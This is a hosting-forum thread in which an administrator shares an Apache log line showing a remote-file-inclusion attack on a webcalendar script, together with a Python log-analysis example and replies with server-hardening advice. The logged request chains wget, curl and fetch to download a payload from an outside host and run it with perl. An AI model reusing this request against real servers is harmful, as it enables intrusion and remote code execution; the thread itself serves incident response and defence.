  1. #1
    Member
    Join Date
    Jan 2003
    Posts
    61

    I did grep "wget" and got this

    Hi,

    I did grep "wget" /usr/local/apache/domlogs/*

    And I got bunches of these as shown below. Don't know what to make of it. It happened to/from 16 different domains on my server, 2 times each. BTW I don't know whose IPs these are.


    Code:
    /usr/local/apache/domlogs/mydomain.com:211.38.128.10 - - [01/Nov/2005:13:51:24 -0600] "GET  
    /webcalendar/tools/send_reminders.php?includedir=http://82.165.228.69/images/fbi.gif?
    &cmd=cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1" 404 - "-"
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    In the meantime I did chmod 700 wget as suggested by chirpy and I updated php (Jackie) and installed apf and did everything else I could find in these forums...

    The reason: outbound UDP DoS attacks from my server. I still don't know where the vulnerability is or if I have done enough to secure my server...

    It's been a long two days for this newbie

    TIA,

    Tina
    Last edited by Tina; 11-05-2005 at 02:48 AM. Reason: line wrap the code so it's easier to read
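A plain grep for "wget" matches anything containing that string, so here is an added example (not code from the thread) that parses a combined-format domlog line, URL-decodes the query string, flags parameters that point at a remote URL (the includedir= file-inclusion marker in the log above) and lists the downloader and interpreter commands chained into the request. It assumes the log format and the "<logfile>:" prefix that grep adds; the sample lines are constructed with documentation addresses and mirror the request shape in this post.

```python
# Added example (not from the thread): parse a combined-format domlog line, URL-decode
# its query string, flag parameters pointing at a remote URL and list chained commands.
import re
from urllib.parse import unquote, urlparse

# The optional "<logfile>:" prefix is what grep adds when searching several domlogs.
LOG_RE = re.compile(
    r'^(?:[^ :]+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: \S+)?" (?P<status>\d{3})'
)
TOOLS = {"wget", "curl", "fetch", "lynx", "lwp-download", "perl", "php", "python", "sh", "bash"}
REMOTE = ("http://", "https://", "ftp://")

def split_query(query):
    """Split on '&' before decoding, so a %3B (';') inside a value stays in it."""
    pairs = []
    for part in query.split("&"):
        key, _, value = part.partition("=")
        pairs.append((unquote(key), unquote(value)))
    return pairs

def analyse(line):
    """Return a finding dict for a suspicious request, or None for a normal one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    params = split_query(uri.partition("?")[2])
    # A parameter whose value is itself a URL is the remote-file-inclusion marker.
    remote_includes = [(k, urlparse(v).netloc) for k, v in params if v.startswith(REMOTE)]
    # Values are split on ';' to recover the chained shell commands (cd, wget, curl, ...).
    commands = [c.strip() for _, v in params for c in v.split(";") if c.strip()]
    tools = sorted({c.split()[0] for c in commands if c.split()[0] in TOOLS})
    hosts = sorted({urlparse(t).netloc for c in commands for t in c.split() if t.startswith(REMOTE)})
    if not remote_includes and not tools:
        return None
    return {"src_ip": m.group("ip"), "script": urlparse(uri).path, "status": int(m.group("status")),
            "remote_includes": remote_includes, "tools": tools, "remote_hosts": hosts}
# Constructed sample lines (RFC 5737 addresses) mirroring the request in post #1;
# the second is a benign hit that a plain grep for "wget" would also match.
SAMPLE_LOG = [
    '/usr/local/apache/domlogs/example.com:198.51.100.10 - - [01/Nov/2005:13:51:24 -0600] '
    '"GET /webcalendar/tools/send_reminders.php?includedir=http://203.0.113.5/images/fbi.gif?'
    '&cmd=cd%20/tmp;wget%20http://203.0.113.9/images/sess_deadbeef;curl%20-O%20http://203.0.113.9'
    '/images/sess_deadbeef;perl%20sess_deadbeef;rm%20-rf%20sess* HTTP/1.1" 404 - "-" "Mozilla/4.0"',
    '/usr/local/apache/domlogs/example.com:198.51.100.20 - - [01/Nov/2005:14:02:01 -0600] '
    '"GET /docs/wget-manual.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
def findings(lines=SAMPLE_LOG):
    return [f for f in map(analyse, lines) if f]
```

The 404 on one vhost only says that path did not exist there; the same request against a domain that does host the script is the one to look at, together with the remote_hosts it lists for egress filtering.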

  2. #2
    Member
    Join Date
    Apr 2003
    Posts
    174
    cPanel/Enkompass Access Level

    Root Administrator


    Try setting up mod_security (there's plenty of threads on how to do it around here).

  3. #3
    Member
    Join Date
    Jan 2003
    Posts
    61


    It's done. Thank you. Anything else I can do?

  4. #4
    Member
    Join Date
    Apr 2003
    Posts
    174
    cPanel/Enkompass Access Level

    Root Administrator


    There's quite a few good threads around here with instructions for securing your server; if you follow their recommendations you should be ok.

  5. #5
    Member
    Join Date
    Jul 2003
    Posts
    275

  6. #6
    Member
    Join Date
    Jan 2003
    Posts
    61


    Yes. I went through all the guides, implemented almost all the suggestions. How do I know that I am ok now? How do I know if I fixed what was broken when I don't know what was broken? It's all a mystery really. Here's what I did.

    installed or upgraded or compiled:

    mod_security
    php 4.4.1
    chkrootkit (cron job 3 times a day - a bit much I see but I am learning)
    rkhunter
    ssh login to different port, ip and protocol 2
    ssh root login disabled
    apf with antidos
    bfd
    log watch (10)
    mail :fail:
    chmod 700 wget
    telnet disabled
    mysql password changed different from root
    some whm config changes

    What I don't understand yet is whether or not I should do anything with the /tmp directory and phpsuexec.

    And I need to upgrade my os.

    So am I ok? Is this enough? I have 2 more boxes to work on after I finish this one.

    T.

  7. #7
    Member
    Join Date
    Jul 2003
    Posts
    275


    Really, you should do something with your /tmp as well, yes. There is a tutorial on that site for mounting /tmp with permissions to help prevent files from being run inside the /tmp directory. It's not 100% effective anymore, but will stop most of the 'scripts' from getting going.
    Also note that wget is just one method used to download files to the server.
    http://www.eth0.us/node/6
    http://www.eth0.us/obscurity
    http://www.eth0.us/php

    Also, while it's a bit on the technical side, you might want to also check your Kernel version, and if it's outdated, look into compiling an updated and more secured version.

    In your APF, you have egress filtering enabled, yes?
